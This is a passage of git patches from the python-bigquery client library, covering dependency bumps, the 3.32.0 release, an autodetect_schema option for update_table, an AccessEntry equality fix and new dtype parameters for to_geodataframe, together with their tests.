a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,4 @@ -google-cloud-testutils==1.6.0 +google-cloud-testutils==1.6.2 pytest==8.3.5 mock==5.2.0 pytest-xdist==3.6.1 diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index fa349e0d3..b98f4ace9 100644 --- a/samples/desktopapp/requirements.txt +++ 
b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ google-cloud-bigquery==3.31.0 -google-auth-oauthlib==1.2.1 +google-auth-oauthlib==1.2.2 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 37bcdf687..2b5a71c8c 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,8 +1,9 @@ attrs==25.3.0 -certifi==2025.1.31 +certifi==2025.4.26 cffi==1.17.1 -charset-normalizer==3.4.1 -click==8.1.8 +charset-normalizer==3.4.2 +click===8.1.8; python_version == '3.9' +click==8.2.0; python_version >= '3.10' click-plugins==1.1.1 cligj==0.7.2 db-dtypes==1.4.2 @@ -10,21 +11,21 @@ Fiona==1.10.1 geojson==3.2.0 geopandas==1.0.1 google-api-core==2.24.2 -google-auth==2.38.0 +google-auth==2.40.1 google-cloud-bigquery==3.31.0 -google-cloud-bigquery-storage==2.30.0 +google-cloud-bigquery-storage==2.31.0 google-cloud-core==2.4.3 google-crc32c==1.7.1 google-resumable-media==2.7.2 -googleapis-common-protos==1.69.2 +googleapis-common-protos==1.70.0 grpcio==1.71.0 idna==3.10 munch==4.0.0 -mypy-extensions==1.0.0 -packaging==24.2 +mypy-extensions==1.1.0 +packaging==25.0 pandas==2.2.3 proto-plus==1.26.1 -pyarrow==19.0.1 +pyarrow==20.0.0 pyasn1==0.6.1 pyasn1-modules==0.4.2 pycparser==2.22 @@ -33,10 +34,10 @@ python-dateutil==2.9.0.post0 pytz==2025.2 PyYAML==6.0.2 requests==2.32.3 -rsa==4.9 +rsa==4.9.1 Shapely===2.0.7; python_version == '3.9' Shapely==2.1.0; python_version >= '3.10' six==1.17.0 -typing-extensions==4.13.1 +typing-extensions==4.13.2 typing-inspect==0.9.0 -urllib3==2.3.0 +urllib3==2.4.0 diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index 183230cf4..6abea3b4d 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,4 @@ -google-cloud-testutils==1.6.0 +google-cloud-testutils==1.6.2 pytest==8.3.5 mock==5.2.0 pytest-xdist==3.6.1 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 
3ab215951..2c9e158c0 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ bigquery_magics==0.9.0 db-dtypes==1.4.2 google.cloud.bigquery==3.31.0 -google-cloud-bigquery-storage==2.30.0 +google-cloud-bigquery-storage==2.31.0 ipython===8.18.1 pandas==2.2.3 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index 183230cf4..6abea3b4d 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,4 @@ -google-cloud-testutils==1.6.0 +google-cloud-testutils==1.6.2 pytest==8.3.5 mock==5.2.0 pytest-xdist==3.6.1 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index ca5505a2e..d1e2f39fb 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,9 +1,9 @@ bigquery-magics==0.9.0 db-dtypes==1.4.2 google-cloud-bigquery==3.31.0 -google-cloud-bigquery-storage==2.30.0 +google-cloud-bigquery-storage==2.31.0 ipython===8.18.1; python_version == '3.9' -ipython==9.0.2; python_version >= '3.10' +ipython==9.2.0; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' -matplotlib==3.10.1; python_version >= '3.10' +matplotlib==3.10.3; python_version >= '3.10' pandas==2.2.3 diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index 0cf0bb6b4..6760e1228 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -1,5 +1,5 @@ # samples/snippets should be runnable with no "extras" -google-cloud-testutils==1.6.0 +google-cloud-testutils==1.6.2 pytest==8.3.5 mock==5.2.0 pytest-xdist==3.6.1 From 185116ead5f68b959feb339566e964572fe12692 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Mon, 12 May 2025 13:04:01 -0400 Subject: [PATCH 095/202] chore(main): release 3.32.0 (#2152) Co-authored-by: release-please[bot] 
<55107282+release-please[bot]@users.noreply.github.com> --- CHANGELOG.md | 19 +++++++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 20 insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index 4b115464c..ff1bd7acc 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,25 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.32.0](https://github.com/googleapis/python-bigquery/compare/v3.31.0...v3.32.0) (2025-05-12) + + +### Features + +* Add dataset access policy version attribute ([#2169](https://github.com/googleapis/python-bigquery/issues/2169)) ([b7656b9](https://github.com/googleapis/python-bigquery/commit/b7656b97c1bd6c204d0508b1851d114719686655)) +* Add preview support for incremental results ([#2145](https://github.com/googleapis/python-bigquery/issues/2145)) ([22b80bb](https://github.com/googleapis/python-bigquery/commit/22b80bba9d0bed319fd3102e567906c9b458dd02)) +* Add WRITE_TRUNCATE_DATA enum ([#2166](https://github.com/googleapis/python-bigquery/issues/2166)) ([4692747](https://github.com/googleapis/python-bigquery/commit/46927479085f13fd326e3f2388f60dfdd37f7f69)) +* Adds condition class and assoc. 
unit tests ([#2159](https://github.com/googleapis/python-bigquery/issues/2159)) ([a69d6b7](https://github.com/googleapis/python-bigquery/commit/a69d6b796d2edb6ba453980c9553bc9b206c5a6e)) +* Support BigLakeConfiguration (managed Iceberg tables) ([#2162](https://github.com/googleapis/python-bigquery/issues/2162)) ([a1c8e9a](https://github.com/googleapis/python-bigquery/commit/a1c8e9aaf60986924868d54a0ab0334e77002a39)) +* Update the AccessEntry class with a new condition attribute and unit tests ([#2163](https://github.com/googleapis/python-bigquery/issues/2163)) ([7301667](https://github.com/googleapis/python-bigquery/commit/7301667272dfbdd04b1a831418a9ad2d037171fb)) + + +### Bug Fixes + +* `query()` now warns when `job_id` is set and the default `job_retry` is ignored ([#2167](https://github.com/googleapis/python-bigquery/issues/2167)) ([ca1798a](https://github.com/googleapis/python-bigquery/commit/ca1798aaee2d5905fe688d3097f8ee5c989da333)) +* Empty record dtypes ([#2147](https://github.com/googleapis/python-bigquery/issues/2147)) ([77d7173](https://github.com/googleapis/python-bigquery/commit/77d71736fcc006d3ab8f8ba17955ad5f06e21876)) +* Table iterator should not use bqstorage when page_size is not None ([#2154](https://github.com/googleapis/python-bigquery/issues/2154)) ([e89a707](https://github.com/googleapis/python-bigquery/commit/e89a707b162182ededbf94cc9a0f7594bc2be475)) + ## [3.31.0](https://github.com/googleapis/python-bigquery/compare/v3.30.0...v3.31.0) (2025-03-20) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index c0f7a96d6..fe13d2477 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. 
-__version__ = "3.31.0" +__version__ = "3.32.0" From 156e518c46b5efc7bcfc674c9cccbd2492bcacbe Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Mon, 12 May 2025 20:15:23 +0200 Subject: [PATCH 096/202] chore(deps): update dependency db-dtypes to v1.4.3 (#2178) Co-authored-by: Lingqing Gan --- samples/geography/requirements.txt | 2 +- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 2b5a71c8c..3ff1b2944 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -6,7 +6,7 @@ click===8.1.8; python_version == '3.9' click==8.2.0; python_version >= '3.10' click-plugins==1.1.1 cligj==0.7.2 -db-dtypes==1.4.2 +db-dtypes==1.4.3 Fiona==1.10.1 geojson==3.2.0 geopandas==1.0.1 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 2c9e158c0..b000aa50c 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,5 +1,5 @@ bigquery_magics==0.9.0 -db-dtypes==1.4.2 +db-dtypes==1.4.3 google.cloud.bigquery==3.31.0 google-cloud-bigquery-storage==2.31.0 ipython===8.18.1 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index d1e2f39fb..d80ffcd09 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,5 +1,5 @@ bigquery-magics==0.9.0 -db-dtypes==1.4.2 +db-dtypes==1.4.3 google-cloud-bigquery==3.31.0 google-cloud-bigquery-storage==2.31.0 ipython===8.18.1; python_version == '3.9' From 57f940d957613b4d80fb81ea40a1177b73856189 Mon Sep 17 00:00:00 2001 From: Brian Hulette Date: Mon, 12 May 2025 13:10:11 -0700 Subject: [PATCH 097/202] feat: add ability to set autodetect_schema query param in update_table (#2171) * Add ability to set autodetect_schema query_param * fixup! Add ability to set autodetect_schema query_param * fixup! 
Add ability to set autodetect_schema query_param * fixup! Add ability to set autodetect_schema query_param --------- Co-authored-by: Chalmer Lowe --- google/cloud/bigquery/client.py | 11 ++++++++ tests/system/test_client.py | 47 +++++++++++++++++++++++++++++++++ tests/unit/test_client.py | 12 ++++++--- 3 files changed, 67 insertions(+), 3 deletions(-) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index e7cafc47e..8ad1586f4 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -1389,6 +1389,7 @@ def update_table( self, table: Table, fields: Sequence[str], + autodetect_schema: bool = False, retry: retries.Retry = DEFAULT_RETRY, timeout: TimeoutType = DEFAULT_TIMEOUT, ) -> Table: @@ -1419,6 +1420,10 @@ def update_table( fields (Sequence[str]): The fields of ``table`` to change, spelled as the :class:`~google.cloud.bigquery.table.Table` properties. + autodetect_schema (bool): + Specifies if the schema of the table should be autodetected when + updating the table from the underlying source. Only applicable + for external tables. retry (Optional[google.api_core.retry.Retry]): A description of how to retry the API call. 
timeout (Optional[float]): @@ -1438,12 +1443,18 @@ def update_table( path = table.path span_attributes = {"path": path, "fields": fields} + if autodetect_schema: + query_params = {"autodetect_schema": True} + else: + query_params = {} + api_response = self._call_api( retry, span_name="BigQuery.updateTable", span_attributes=span_attributes, method="PATCH", path=path, + query_params=query_params, data=partial, headers=headers, timeout=timeout, diff --git a/tests/system/test_client.py b/tests/system/test_client.py index 9df572b14..6584ca03c 100644 --- a/tests/system/test_client.py +++ b/tests/system/test_client.py @@ -978,6 +978,53 @@ def test_update_table_constraints(self): ) self.assertIsNone(reference_table3.table_constraints, None) + def test_update_table_autodetect_schema(self): + dataset = self.temp_dataset(_make_dataset_id("bq_update_table_test")) + + # Create an external table, restrict schema to one field + TABLE_NAME = "test_table" + set_schema = [bigquery.SchemaField("username", "STRING", mode="NULLABLE")] + table_arg = Table(dataset.table(TABLE_NAME)) + + # Create an external_config and include it in the table arguments + external_config = bigquery.ExternalConfig(bigquery.ExternalSourceFormat.AVRO) + external_config.source_uris = SOURCE_URIS_AVRO + external_config.reference_file_schema_uri = REFERENCE_FILE_SCHEMA_URI_AVRO + external_config.schema = set_schema + table_arg.external_data_configuration = external_config + + self.assertFalse(_table_exists(table_arg)) + + table = helpers.retry_403(Config.CLIENT.create_table)(table_arg) + self.to_delete.insert(0, table) + self.assertTrue(_table_exists(table)) + + self.assertEqual(table.schema, set_schema) + + # Update table with schema autodetection + updated_table_arg = Table(dataset.table(TABLE_NAME)) + + # Update the external_config and include it in the table arguments + updated_external_config = copy.deepcopy(external_config) + updated_external_config.autodetect = True + updated_external_config.schema = None 
+ updated_table_arg.external_data_configuration = updated_external_config + + # PATCH call with autodetect_schema=True to trigger schema inference + updated_table = Config.CLIENT.update_table( + updated_table_arg, ["external_data_configuration"], autodetect_schema=True + ) + + # The updated table should have a schema inferred from the reference + # file, which has all four fields. + expected_schema = [ + bigquery.SchemaField("username", "STRING", mode="NULLABLE"), + bigquery.SchemaField("tweet", "STRING", mode="NULLABLE"), + bigquery.SchemaField("timestamp", "STRING", mode="NULLABLE"), + bigquery.SchemaField("likes", "INTEGER", mode="NULLABLE"), + ] + self.assertEqual(updated_table.schema, expected_schema) + @staticmethod def _fetch_single_page(table, selected_fields=None): iterator = Config.CLIENT.list_rows(table, selected_fields=selected_fields) diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index 34ef680dd..b8140df66 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -2385,7 +2385,7 @@ def test_update_table(self): "resourceTags": {"123456789012/key": "value"}, } conn.api_request.assert_called_once_with( - method="PATCH", data=sent, path="/" + path, timeout=7.5 + method="PATCH", data=sent, path="/" + path, timeout=7.5, query_params={} ) self.assertEqual(updated_table.description, table.description) self.assertEqual(updated_table.friendly_name, table.friendly_name) @@ -2439,6 +2439,7 @@ def test_update_table_w_custom_property(self): path="/%s" % path, data={"newAlphaProperty": "unreleased property"}, timeout=DEFAULT_TIMEOUT, + query_params={}, ) self.assertEqual( updated_table._properties["newAlphaProperty"], "unreleased property" @@ -2475,6 +2476,7 @@ def test_update_table_only_use_legacy_sql(self): path="/%s" % path, data={"view": {"useLegacySql": True}}, timeout=DEFAULT_TIMEOUT, + query_params={}, ) self.assertEqual(updated_table.view_use_legacy_sql, table.view_use_legacy_sql) @@ -2567,9 +2569,10 @@ def 
test_update_table_w_query(self): "schema": schema_resource, }, timeout=DEFAULT_TIMEOUT, + query_params={}, ) - def test_update_table_w_schema_None(self): + def test_update_table_w_schema_None_autodetect_schema(self): # Simulate deleting schema: not sure if back-end will actually # allow this operation, but the spec says it is optional. path = "projects/%s/datasets/%s/tables/%s" % ( @@ -2611,7 +2614,9 @@ def test_update_table_w_schema_None(self): with mock.patch( "google.cloud.bigquery.opentelemetry_tracing._get_final_span_attributes" ) as final_attributes: - updated_table = client.update_table(table, ["schema"]) + updated_table = client.update_table( + table, ["schema"], autodetect_schema=True + ) final_attributes.assert_called_once_with( {"path": "/%s" % path, "fields": ["schema"]}, client, None @@ -2623,6 +2628,7 @@ def test_update_table_w_schema_None(self): sent = {"schema": {"fields": None}} self.assertEqual(req[1]["data"], sent) self.assertEqual(req[1]["path"], "/%s" % path) + self.assertEqual(req[1]["query_params"], {"autodetect_schema": True}) self.assertEqual(len(updated_table.schema), 0) def test_update_table_delete_property(self): From 2d173a5bd8a29dfebe492bc3a79469da7f0fcfbd Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Tue, 13 May 2025 07:53:27 -0400 Subject: [PATCH 098/202] chore(python): remove docs from templates (#2164) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(python): remove docs from templates Source-Link: https://github.com/googleapis/synthtool/commit/3fca64a4bb1772258f8cc939a9192b17dbbbf335 Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:3b3a31be60853477bc39ed8d9bac162cac3ba083724cecaad54eb81d4e4dae9c * 🦉 Updates from OwlBot post-processor See
https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * remove replacement in owlbot.py --------- Co-authored-by: Owl Bot Co-authored-by: Anthonios Partheniou Co-authored-by: Chalmer Lowe --- .github/.OwlBot.lock.yaml | 4 ++-- owlbot.py | 10 ---------- 2 files changed, 2 insertions(+), 12 deletions(-) diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 51b21a62b..cea9eb68f 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:a7aef70df5f13313ddc027409fc8f3151422ec2a57ac8730fce8fa75c060d5bb -# created: 2025-04-10T17:00:10.042601326Z + digest: sha256:3b3a31be60853477bc39ed8d9bac162cac3ba083724cecaad54eb81d4e4dae9c +# created: 2025-04-16T22:40:03.123475241Z diff --git a/owlbot.py b/owlbot.py index 8cfa2b097..60759adbe 100644 --- a/owlbot.py +++ b/owlbot.py @@ -109,16 +109,6 @@ python.py_samples() -s.replace( - "docs/conf.py", - r'\{"members": True\}', - '{"members": True, "inherited-members": True}', -) -s.replace( - "docs/conf.py", - r"exclude_patterns = \[", - '\\g<0>\n "google/cloud/bigquery_v2/**", # Legacy proto-based types.', -) s.replace( "samples/**/noxfile.py", 'BLACK_VERSION = "black==22.3.0"', From 02176377d5e2fc25b5cd4f46aa6ebfb1b6a960a6 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Wed, 14 May 2025 04:36:37 -0500 Subject: [PATCH 099/202] fix: ensure AccessEntry equality and repr uses the correct `entity_type` (#2182) * 
fix: ensure AccessEntry equality and repr uses the correct `entity_type` * add a test for access_entries --- google/cloud/bigquery/dataset.py | 4 +-- tests/unit/test_dataset.py | 44 ++++++++++++++++++++++++++++++++ 2 files changed, 46 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/dataset.py b/google/cloud/bigquery/dataset.py index d225b7106..f788275cd 100644 --- a/google/cloud/bigquery/dataset.py +++ b/google/cloud/bigquery/dataset.py @@ -512,7 +512,7 @@ def __ne__(self, other): return not self == other def __repr__(self): - return f"" + return f"" def _key(self): """A tuple key that uniquely describes this field. @@ -531,7 +531,7 @@ def _key(self): properties["condition"] = condition_key prop_tup = tuple(sorted(properties.items())) - return (self.role, self._entity_type, self.entity_id, prop_tup) + return (self.role, self.entity_type, self.entity_id, prop_tup) def __hash__(self): return hash(self._key()) diff --git a/tests/unit/test_dataset.py b/tests/unit/test_dataset.py index 941430827..5cce2a9a7 100644 --- a/tests/unit/test_dataset.py +++ b/tests/unit/test_dataset.py @@ -613,6 +613,15 @@ def test_equality_and_hash_without_condition(self): assert hash(entry1) == hash(entry2) assert hash(entry1) != hash(entry3) # Usually true + def test_equality_and_hash_from_api_repr(self): + """Compare equal entries where one was created via from_api_repr.""" + entry1 = AccessEntry("OWNER", "specialGroup", "projectOwners") + entry2 = AccessEntry.from_api_repr( + {"role": "OWNER", "specialGroup": "projectOwners"} + ) + assert entry1 == entry2 + assert hash(entry1) == hash(entry2) + def test_equality_and_hash_with_condition(self, condition_1, condition_2): cond1a = Condition( condition_1.expression, condition_1.title, condition_1.description @@ -746,6 +755,13 @@ def test_dataset_property_with_condition(self, condition_1): assert "dataset" in entry._properties assert "condition" in entry._properties + def test_repr_from_api_repr(self): + """Check that repr() 
includes the correct entity_type when the object is initialized from a dictionary.""" + api_repr = {"role": "OWNER", "userByEmail": "owner@example.com"} + entry = AccessEntry.from_api_repr(api_repr) + entry_str = repr(entry) + assert entry_str == "" + class TestDatasetReference(unittest.TestCase): @staticmethod @@ -1097,6 +1113,34 @@ def test_ctor_explicit(self): self.assertIsNone(dataset.location) self.assertEqual(dataset.is_case_insensitive, False) + def test_access_entries_getter_from_api_repr(self): + """Check that `in` works correctly when Dataset is made via from_api_repr().""" + from google.cloud.bigquery.dataset import AccessEntry + + dataset = self._get_target_class().from_api_repr( + { + "datasetReference": {"projectId": "my-proj", "datasetId": "my_dset"}, + "access": [ + { + "role": "OWNER", + "userByEmail": "uilma@example.com", + }, + { + "role": "READER", + "groupByEmail": "rhubbles@example.com", + }, + ], + } + ) + assert ( + AccessEntry("OWNER", "userByEmail", "uilma@example.com") + in dataset.access_entries + ) + assert ( + AccessEntry("READER", "groupByEmail", "rhubbles@example.com") + in dataset.access_entries + ) + def test_access_entries_setter_non_list(self): dataset = self._make_one(self.DS_REF) with self.assertRaises(TypeError): From ebfd0a83d43bcb96f65f5669437220aa6138b766 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Wed, 14 May 2025 13:34:26 -0400 Subject: [PATCH 100/202] feat: Add dtype parameters to to_geodataframe functions (#2176) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat: Add dtype parameters to to_geodataframe This change adds support for `bool_dtype`, `int_dtype`, `float_dtype`, and `string_dtype` parameters to the `to_geodataframe` method in `RowIterator` and `QueryJob`. These parameters allow you to specify the desired pandas dtypes for boolean, integer, float, and string columns when converting BigQuery results to GeoDataFrames. 
The changes include: - Updating `RowIterator.to_geodataframe` to accept and pass these dtype parameters to the underlying `to_dataframe` method. - Updating `QueryJob.to_geodataframe` to accept and pass these dtype parameters to the underlying `RowIterator.to_geodataframe` method. - Adding unit tests to verify the correct handling of these parameters. * updates to several tests re geopandas as well as imports * updates to enum import * 🦉 Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * Update pyproject.toml Co-authored-by: Tim Sweña (Swast) * Update testing/constraints-3.9.txt Co-authored-by: Tim Sweña (Swast) --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> Co-authored-by: Owl Bot Co-authored-by: Tim Sweña (Swast) --- docs/conf.py | 3 +- google/cloud/bigquery/job/query.py | 36 ++++++++++ google/cloud/bigquery/table.py | 44 ++++++++++++ noxfile.py | 4 +- pyproject.toml | 8 ++- testing/constraints-3.9.txt | 2 +- tests/unit/job/test_query_pandas.py | 6 ++ tests/unit/test_table.py | 9 ++- tests/unit/test_table_pandas.py | 103 ++++++++++++++++++++++++++++ 9 files changed, 205 insertions(+), 10 deletions(-) diff --git a/docs/conf.py b/docs/conf.py index 826298090..df1c18b68 100644 --- a/docs/conf.py +++ b/docs/conf.py @@ -61,7 +61,7 @@ # autodoc/autosummary flags autoclass_content = "both" -autodoc_default_options = {"members": True, "inherited-members": True} +autodoc_default_options = {"members": True} autosummary_generate = True @@ -109,7 +109,6 @@ # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = [ - "google/cloud/bigquery_v2/**", # Legacy proto-based types.
"_build", "**/.nox/**/*", "samples/AUTHORING_GUIDE.md", diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index f14039bc0..f9b99b7fb 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -2102,6 +2102,10 @@ def to_geodataframe( create_bqstorage_client: bool = True, max_results: Optional[int] = None, geography_column: Optional[str] = None, + bool_dtype: Union[Any, None] = DefaultPandasDTypes.BOOL_DTYPE, + int_dtype: Union[Any, None] = DefaultPandasDTypes.INT_DTYPE, + float_dtype: Union[Any, None] = None, + string_dtype: Union[Any, None] = None, ) -> "geopandas.GeoDataFrame": """Return a GeoPandas GeoDataFrame from a QueryJob @@ -2152,6 +2156,34 @@ def to_geodataframe( identifies which one to use to construct a GeoPandas GeoDataFrame. This option can be ommitted if there's only one GEOGRAPHY column. + bool_dtype (Optional[pandas.Series.dtype, None]): + If set, indicate a pandas ExtensionDtype (e.g. ``pandas.BooleanDtype()``) + to convert BigQuery Boolean type, instead of relying on the default + ``pandas.BooleanDtype()``. If you explicitly set the value to ``None``, + then the data type will be ``numpy.dtype("bool")``. BigQuery Boolean + type can be found at: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#boolean_type + int_dtype (Optional[pandas.Series.dtype, None]): + If set, indicate a pandas ExtensionDtype (e.g. ``pandas.Int64Dtype()``) + to convert BigQuery Integer types, instead of relying on the default + ``pandas.Int64Dtype()``. If you explicitly set the value to ``None``, + then the data type will be ``numpy.dtype("int64")``. A list of BigQuery + Integer types can be found at: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#integer_types + float_dtype (Optional[pandas.Series.dtype, None]): + If set, indicate a pandas ExtensionDtype (e.g. 
``pandas.Float32Dtype()``) + to convert BigQuery Float type, instead of relying on the default + ``numpy.dtype("float64")``. If you explicitly set the value to ``None``, + then the data type will be ``numpy.dtype("float64")``. BigQuery Float + type can be found at: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#floating_point_types + string_dtype (Optional[pandas.Series.dtype, None]): + If set, indicate a pandas ExtensionDtype (e.g. ``pandas.StringDtype()``) to + convert BigQuery String type, instead of relying on the default + ``numpy.dtype("object")``. If you explicitly set the value to ``None``, + then the data type will be ``numpy.dtype("object")``. BigQuery String + type can be found at: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#string_type Returns: geopandas.GeoDataFrame: @@ -2175,6 +2207,10 @@ def to_geodataframe( progress_bar_type=progress_bar_type, create_bqstorage_client=create_bqstorage_client, geography_column=geography_column, + bool_dtype=bool_dtype, + int_dtype=int_dtype, + float_dtype=float_dtype, + string_dtype=string_dtype, ) def __iter__(self): diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 503ca4e71..e084468f6 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -2727,6 +2727,10 @@ def to_geodataframe( progress_bar_type: Optional[str] = None, create_bqstorage_client: bool = True, geography_column: Optional[str] = None, + bool_dtype: Union[Any, None] = DefaultPandasDTypes.BOOL_DTYPE, + int_dtype: Union[Any, None] = DefaultPandasDTypes.INT_DTYPE, + float_dtype: Union[Any, None] = None, + string_dtype: Union[Any, None] = None, ) -> "geopandas.GeoDataFrame": """Create a GeoPandas GeoDataFrame by loading all pages of a query. @@ -2778,6 +2782,34 @@ def to_geodataframe( identifies which one to use to construct a geopandas GeoDataFrame. This option can be ommitted if there's only one GEOGRAPHY column. 
+ bool_dtype (Optional[pandas.Series.dtype, None]): + If set, indicate a pandas ExtensionDtype (e.g. ``pandas.BooleanDtype()``) + to convert BigQuery Boolean type, instead of relying on the default + ``pandas.BooleanDtype()``. If you explicitly set the value to ``None``, + then the data type will be ``numpy.dtype("bool")``. BigQuery Boolean + type can be found at: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#boolean_type + int_dtype (Optional[pandas.Series.dtype, None]): + If set, indicate a pandas ExtensionDtype (e.g. ``pandas.Int64Dtype()``) + to convert BigQuery Integer types, instead of relying on the default + ``pandas.Int64Dtype()``. If you explicitly set the value to ``None``, + then the data type will be ``numpy.dtype("int64")``. A list of BigQuery + Integer types can be found at: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#integer_types + float_dtype (Optional[pandas.Series.dtype, None]): + If set, indicate a pandas ExtensionDtype (e.g. ``pandas.Float32Dtype()``) + to convert BigQuery Float type, instead of relying on the default + ``numpy.dtype("float64")``. If you explicitly set the value to ``None``, + then the data type will be ``numpy.dtype("float64")``. BigQuery Float + type can be found at: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#floating_point_types + string_dtype (Optional[pandas.Series.dtype, None]): + If set, indicate a pandas ExtensionDtype (e.g. ``pandas.StringDtype()``) to + convert BigQuery String type, instead of relying on the default + ``numpy.dtype("object")``. If you explicitly set the value to ``None``, + then the data type will be ``numpy.dtype("object")``. 
BigQuery String + type can be found at: + https://cloud.google.com/bigquery/docs/reference/standard-sql/data-types#string_type Returns: geopandas.GeoDataFrame: @@ -2829,6 +2861,10 @@ def to_geodataframe( progress_bar_type, create_bqstorage_client, geography_as_object=True, + bool_dtype=bool_dtype, + int_dtype=int_dtype, + float_dtype=float_dtype, + string_dtype=string_dtype, ) return geopandas.GeoDataFrame( @@ -2932,6 +2968,10 @@ def to_geodataframe( progress_bar_type=None, create_bqstorage_client=True, geography_column: Optional[str] = None, + bool_dtype: Union[Any, None] = DefaultPandasDTypes.BOOL_DTYPE, + int_dtype: Union[Any, None] = DefaultPandasDTypes.INT_DTYPE, + float_dtype: Union[Any, None] = None, + string_dtype: Union[Any, None] = None, ) -> "pandas.DataFrame": """Create an empty dataframe. @@ -2941,6 +2981,10 @@ def to_geodataframe( progress_bar_type (Any): Ignored. Added for compatibility with RowIterator. create_bqstorage_client (bool): Ignored. Added for compatibility with RowIterator. geography_column (str): Ignored. Added for compatibility with RowIterator. + bool_dtype (Any): Ignored. Added for compatibility with RowIterator. + int_dtype (Any): Ignored. Added for compatibility with RowIterator. + float_dtype (Any): Ignored. Added for compatibility with RowIterator. + string_dtype (Any): Ignored. Added for compatibility with RowIterator. Returns: pandas.DataFrame: An empty :class:`~pandas.DataFrame`. diff --git a/noxfile.py b/noxfile.py index c2b4bbb50..1922a68a5 100644 --- a/noxfile.py +++ b/noxfile.py @@ -109,9 +109,7 @@ def default(session, install_extras=True): # that logic (and the associated tests) we avoid installing the [ipython] extra # which has a downstream effect of then avoiding installing bigquery_magics. 
